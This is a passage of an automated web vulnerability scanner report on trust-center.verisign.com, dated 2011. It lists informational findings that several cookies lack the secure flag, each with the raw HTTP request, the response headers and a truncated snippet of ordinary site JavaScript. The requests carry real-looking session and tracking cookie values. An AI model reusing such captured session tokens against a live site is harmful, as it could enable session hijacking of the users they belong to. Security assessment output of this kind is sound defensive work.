Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

/* Create new OnlineOpini
...[SNIP]...

6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var OnlineOpinion=new Ob
...[SNIP]...

6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/popup.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(
...[SNIP]...

6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ
...[SNIP]...

6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle
...[SNIP]...

6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/script_log.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}}
function generateCall(level,message){var url='
...[SNIP]...

6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
   Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

/*

...[SNIP]...

6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/syscheck.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}}
function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o
...[SNIP]...

6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi
...[SNIP]...

6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Copyright . 1999-2009 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''

...[SNIP]...

6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi
...[SNIP]...

6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

